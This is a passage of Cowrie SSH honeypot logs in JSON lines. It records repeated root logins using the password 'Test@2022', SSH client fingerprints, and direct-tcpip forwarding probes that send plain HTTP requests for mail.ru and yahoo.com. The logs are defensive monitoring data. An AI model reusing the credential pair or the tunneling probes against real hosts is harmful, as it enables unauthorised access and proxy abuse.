56-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.280250Z","src_ip":"77.83.207.83","session":"58b28921e638"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.528956Z","src_ip":"77.83.207.83","session":"58b28921e638"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28032,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28032","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.579630Z","session":"58b28921e638"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.629310Z","src_ip":"77.83.207.83","session":"58b28921e638"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7052,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7052","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.772019Z","session":"58b28921e638"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.821769Z","src_ip":"77.83.207.83","session":"58b28921e638"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":25289,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25289","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.964152Z","session":"58b28921e638"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.014069Z","src_ip":"77.83.207.83","session":"58b28921e638"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.065369Z","src_ip":"77.83.207.83","session":"58b28921e638"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":26562,"dst_ip":"1.2.3.4","dst_port":22,"session":"097df1b19a80","protocol":"ssh","message":"New connection: 77.83.207.83:26562 (1.2.3.4:22) [session: 097df1b19a80]","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.115159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.115971Z","src_ip":"77.83.207.83","session":"097df1b19a80"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.166518Z","src_ip":"77.83.207.83","session":"097df1b19a80"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.417891Z","src_ip":"77.83.207.83","session":"097df1b19a80"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":25515,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:25515","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.469052Z","session":"097df1b19a80"}
{"eventid":"cowrie.login.failed","username":"master","password":"123456789","message":"login attempt [master/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.495092Z","src_ip":"212.227.235.229","session":"e40c521502d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.519415Z","src_ip":"77.83.207.83","session":"097df1b19a80"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32231,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32231","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.660632Z","session":"097df1b19a80"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.711018Z","src_ip":"77.83.207.83","session":"097df1b19a80"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":18184,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18184","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.852695Z","session":"097df1b19a80"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.902964Z","src_ip":"77.83.207.83","session":"097df1b19a80"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:49.954167Z","src_ip":"77.83.207.83","session":"097df1b19a80"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":26647,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca9f412a846d","protocol":"ssh","message":"New connection: 77.83.207.83:26647 (1.2.3.4:22) [session: ca9f412a846d]","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.002348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.012666Z","src_ip":"77.83.207.83","session":"ca9f412a846d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.052234Z","src_ip":"77.83.207.83","session":"ca9f412a846d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.299754Z","src_ip":"77.83.207.83","session":"ca9f412a846d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6845,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:6845","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.350258Z","session":"ca9f412a846d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.399873Z","src_ip":"77.83.207.83","session":"ca9f412a846d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":15023,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:15023","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.540074Z","session":"ca9f412a846d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.589867Z","src_ip":"77.83.207.83","session":"ca9f412a846d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":25045,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25045","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.731999Z","session":"ca9f412a846d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.782059Z","src_ip":"77.83.207.83","session":"ca9f412a846d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.833443Z","src_ip":"77.83.207.83","session":"ca9f412a846d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":26749,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbace3582834","protocol":"ssh","message":"New connection: 77.83.207.83:26749 (1.2.3.4:22) [session: dbace3582834]","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.882147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.892366Z","src_ip":"77.83.207.83","session":"dbace3582834"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:50.932034Z","src_ip":"77.83.207.83","session":"dbace3582834"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.180797Z","src_ip":"77.83.207.83","session":"dbace3582834"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.203845Z","src_ip":"212.227.125.160","session":"86eacc4d7083"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.204767Z","src_ip":"212.227.125.160","session":"86eacc4d7083"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4007,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4007","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.231647Z","session":"dbace3582834"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.281433Z","src_ip":"77.83.207.83","session":"dbace3582834"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.305870Z","src_ip":"212.227.235.229","session":"e40c521502d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":12698,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12698","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.424116Z","session":"dbace3582834"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.474326Z","src_ip":"77.83.207.83","session":"dbace3582834"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":17867,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:17867","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.616076Z","session":"dbace3582834"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.666054Z","src_ip":"77.83.207.83","session":"dbace3582834"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.716565Z","src_ip":"77.83.207.83","session":"dbace3582834"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":26863,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec216fd1af02","protocol":"ssh","message":"New connection: 77.83.207.83:26863 (1.2.3.4:22) [session: ec216fd1af02]","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.765127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.765964Z","src_ip":"77.83.207.83","session":"ec216fd1af02"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:51.815399Z","src_ip":"77.83.207.83","session":"ec216fd1af02"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.062543Z","src_ip":"77.83.207.83","session":"ec216fd1af02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10184,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:10184","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.113023Z","session":"ec216fd1af02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.162649Z","src_ip":"77.83.207.83","session":"ec216fd1af02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":213,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:213","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.303950Z","session":"ec216fd1af02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.354210Z","src_ip":"77.83.207.83","session":"ec216fd1af02"}
